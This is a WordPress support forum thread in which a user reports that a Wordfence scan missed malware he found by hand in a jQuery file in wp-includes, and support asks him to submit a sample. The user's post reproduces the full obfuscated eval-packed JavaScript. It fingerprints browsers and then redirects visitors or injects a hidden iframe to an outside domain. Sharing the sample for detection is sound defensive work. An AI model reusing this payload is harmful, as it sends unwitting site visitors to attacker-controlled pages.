Scan didn't detect Eval base64
-
I did a scan and Wordfence didn’t detect eval base64. I found it manually myself. Any ideas why this wouldn’t have been found? It was in the wp-includes folder
-
Hi,
If you can provide some more info, I’ll do some digging and see what I can find.
What files were infected? Was it a theme? Are you on a shared host?
Thanks!
BrianHi Brian,
It was a JS file ==> /wp-includes/jquery/(filename).js
The site is on a dedicated server so not a shared host. Not a theme file. The top of the file had this in it:
/*b534e251c42006533d5cbd60af31080a*/eval(function(p,a,c,k,e,d){e=function(c){return c};if(!”.replace(/^/,String)){while(c–){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(’14 113=225(39(){11(15.57!=125&&43 15.57!=”42″){226(113);11(43 23[“99″]==”42”){23[“99″]=1;14 79=(73()&&130());14 109=!79&&!!23.227&&23.31.224===”223 219.”;14 89=-1;14 36=”220://221.222/228″;11(68()&&89==1){11((31.51.95(/229/19))||(31.51.95(/235/19))){78.236(36)}22{23.78=36;15.78=36}}22{11((79&&!109&&!68())){14 59=”<74 237=\\”234:233;230:-231;\\”><128 232=\\”123\\” 218=\\””+36+”\\” 217=\\”123\\”></128></74>”;14 34=15.204(“74″);11(34.119==0){15.57.44=15.57.44+59}22{14 94=34.119;14 58=205.206((94/2));34[58].44=34[58].44+59}}}}127()}},100);39 127(){14 63=”126″;11(63!=”126″){14 35=15.203(63);11(43 35!=42&&35!=125){35.202=””;198 35}}};39 130(){11(15.29&&!15.199){16 24}22 11(15.29&&!23.200){16 24}22 11(15.29&&!15.201){16 24}22 11(15.29&&!15.207){16 24}22 11(15.29&&!23.208){16 24}22 11(15.29){16 24}22 11(43 31.214!=”42″&&!15.29&&73()){16 24}22{16 82}}39 73(){14 17=23.31.51;14 55=17.27(“215 “);11(55>0){16 71(17.64(55+5,17.27(“.”,55)),10)}14 97=17.27(“216/”);11(97>0){14 69=17.27(“213:”);16 71(17.64(69+3,17.27(“.”,69)),10)}14 48=17.27(“212/”);11(48>0){16 71(17.64(48+5,17.27(“.”,48)),10)}16 82}39 68(){14 75=23.31.51.209();11(/(210|211\\66+|238).+107|239|267\\/|268|269|266|265|197|262|263|90(264|104)|121|270|271 |277|278|279|107.+276|275|272 25(273|274)19|260( 88)?|259|41(246|247)\\/|248|245|244|240(4|6)0|241|242|122\\.(243|249)|250|256|257 258|255|254/19.111(75)||/251|252|253|280|174|50[1-6]19|142|144|33 115|148|114(134|110|56\\-)|133(160|161)|91(156|101|93)|150|154(153|72|152)|151|92(155|76)|159(77|157)|158|162(147|\\-25|136 |56 )|138|135(102|129|137)|103(139|143)|141(114|196)|186(187|28)46|185|181\\-(182|65)|183\\/|188|189|194\\-|195|193|192|177\\-|93(173|86)|184|166(96|129|165)|168|170\\-56|179|163|145|106(26|41)105|149(12|\\-66)|146(49|133)|178(176|175)|134(172|171)|164|167([4-7]0|88|115|169)|180|191(\\-|131)|118 65|190|140|261\\-5|38\\-62|76(\\.46|104)|320(397|398)|399|400|396\\-(25|41|30)|395\\-|391(108|120)|392( 19|90)|393\\-26|394(26(\\-| |131|33|38|41|56|30)|401)|402(409|410)|19\\-(20|76|67)|411|408( |\\-|\\/)|281|407|403|404|405|406|390|121|389(30|28)33|374|375|376|377|373|372( |\\/)|368|369 |370\\-|371(26|112)|378(379|386)|413( 38|\\/(112|388|65)|50|54|\\-[33-46])|385|384|380\\-46|381|382\\/|67(77|383|412)|87(37|21|101)|25\\-431|436(434|84)|439(440|438|117)|435|62(37|447|103|445|106|30(\\-| |105|28)|444)|443(50|437|28 )|432|419|420[0-2]|433[2-3]|421(0|2)|414(0|2|5)|415(0(0|1)|10)|416((26|25)\\-|422|423|429|426|425)|424(6|19)|427|428|430(417|418)|446|442|441|387(33|66|30)|366|310(13|\\-([1-8]|26))|311|312|124(309|308)|304\\-2|305(102|306|116)|307|313|108\\-38|314\\-33|367(321|12|21|32|60|\\-[2-7]|19\\-)|322|319|318|315|316|317(303|302)|288\\/|289(290|67|287|286|72|282)|283(37|132\\-|110|41\\-)|284\\/|116(26(\\-|0|1)|47|87|86|84)|285\\-|291|292(\\-|25)|299\\-0|300(45|301)|298(91|92|297|96|293)|294(295|72)|296(37|132\\-|28\\-|28 )|323(37|324)|353(18|50)|354(355|10|18)|120(352|351)|347\\-|348\\-|349(19|25)|350\\-|30\\-62|356(124|357)|117(70|25\\-|363|364)|365\\-9|122(\\.362|118|361)|358|359|360|346|345(331|77)|332(40|5[0-3]|\\-28)|333|330|329|325(52|53|60|61|70|80|81|83|85|98)|326(\\-| )|327|328|334(38 |335|342)|343|344|341|340\\-|336|337|338\\-/19.111(75.339(0,4))){16 24}16 82}’,10,448,’|||||||||||if|||var|document|return|HPBJgrsPCHSKRooCSfFKUPtQSHhPpXTMrJRxpVbO||i|||else|window|true|m|c|indexOf|v|all|t|navigator||a|MCaQwvpjUmtBqcPYzgWliXmZPBzILQsWecitLV|mlNejnGRDFoMrKpCkbNtoYExLBQntbLtnlIF|WCdBJlkPSASuNMxLEgEXHpIPBnICmFJsiy|01|g|function||p|undefined|typeof|innerHTML||w||yCgElnHWsSrcjmuYoMmhngIvMNokcUiJIjw|||userAgent||||LARvLITLJRXwkEPGPiIEqjPSpXveOBF|s|body|WuueSQisBmloAGfQTZctCvdtBKxDdDLo|KzNjeJAhCiAZQAAGoEsMETLBxkXwRmkiHKqpVB|||mo|adsQzuxevDroaHFVcjSuLqAJljAVPrpFpL|substring|u|d|ma|WxHYKzSjmIZPfoKwXAgRLieaorcuMAKUSQoV|vGeYZzxGUigKNEJEAAIkosQXeVjxdJImu||parseInt|ny|aUaEhOVgaMxAeZrmNxdRPqgvqYXHduMlE|div|QhxSRLpMNEIsRLqPASzHaAZnAPdxZxx|go|te|location|VoiuQGWKzqbGsHzrnWlNrJnkPpbQoVUW|||false||ri||nd|mc|os|MSuybQFqyBexVNUuYEgNJUnwdWUYRfDYJjYUN|ip|al|ar|co|dl_name|match|it|JqrPUuqqGIdyRjGXPJeRjWOGIEYkcVU||v_b534e251c42006533d5cbd60af31080a||ca|ck|bi|od|o|do|mobile|pt|YyxiqDTdmjgDoiCwXeKxseGOcyWGWohUhdJ|oo|test|k|NGDvNPIYnVGVXCAbDMmsqeksGWIeUzUJZouxU|ac|wa|se|ts|g1|length|ta|iris|up|18px|pl|null|none|wEFSzZujMlxoNYDlPgZLNUtSsYcPZdUzMO|iframe|ll|oaUPUMrwePLScyLgxaLbRuZXUxvfkGvWcZeo|_|h|ai|er|be|r|nq|avan|lb|gene|bl|770s|rd|802s|dmob|el|di|abac|ds|amoi|aptu|yw|ex|an|ch|av|us|attw|as|ko|rn|au|dica|esl8|ng|da|ez|dbte|ze|dc|k0|ic|mp|4thp|ul|l2|cmd|em|devi|fetc|bw|n|c55|craw|bumb|br|e|capi|ccwa|g560|fly|cldc|chtm|cdm|cell|az|fennec|delete|compatMode|XMLHttpRequest|querySelector|outerHTML|getElementById|getElementsByTagName|Math|floor|addEventListener|atob|toLowerCase|android|bb|Edge|rv|maxTouchPoints|MSIE|Trident|height|src|Inc|http|blondinkaulya|cf|Google|vendor|setInterval|clearInterval|chrome|052F|iPhone|left|2564px|width|absolute|position|iPod|replace|style|meego|avantgo|series|symbian|treo|browser|psp|pocket|ixi|re|plucker|link|vodafone|1207|6310|6590|xiino|xda|wap|windows|ce|phone|palm|gf|hiptop|iemobile|hone|elaine|compal|bada|blackberry|blazer|kindle|lge|opera|ob|in|netfront|firefox|maemo|midp|mmp|3gso|ibro|va|sc|sdk|sgh|ms|mm|s55|sa|ge|shar|sie|t5|so|ft|sp|b3|sm|sk|sl|id|zo|ve|pn|po|rt|prox|uc|ay|pg|phil|pire|psio|qa|raks|rim9|ro|r600|r380|gr|07|qtek|sy|mb|vx|w3c|webc|whit|vulc|voda|rg|vk|vm40|wi|nc|your|zeto|zte|substr|yas|x700|nw|wmlb|wonu|vi|veri|tcl|tdg|tel|tim|lk|gt|t2|t6|00|to|sh|utst|v400|v750|si|b|m3|m5|tx|pdxg|qc|klon|kpt|kwc|kyo|kgt|keji|jbro|jemu|jigs|kddi|le|no|m1|m3ga|m50|ui|lynx|libw|xi|pan|l|ja|ipaq|hi|hp|hs|ht|hei|hd|ad|un|haie|hcit|tp|hu|ig01|ikom|im1k|inno|idea|iac|aw|tc|i230|xo|lg|n50|n7|ne|ti|wv|mywa|n10|n30|on|tf|nok|wt|wg|nzph|o2im|wf|op|cr|mwbp|n20|rc|mmef|me|p1|oa|mi|o8|p800|owg1|mt|zz|de|oran|02′.split(‘|’),0,{}))
/*b534e251c42006533d5cbd60af31080a*//*******The scan didn’t find this, I ended up fiding this digging through file and searching .
Mike
Hi Mike,
Will you please send the file to samples@wordfence.com and include that it was not detected in the scan? That will get in the queue to get evaluated.
-Brian
The topic ‘Scan didn't detect Eval base64’ is closed to new replies.
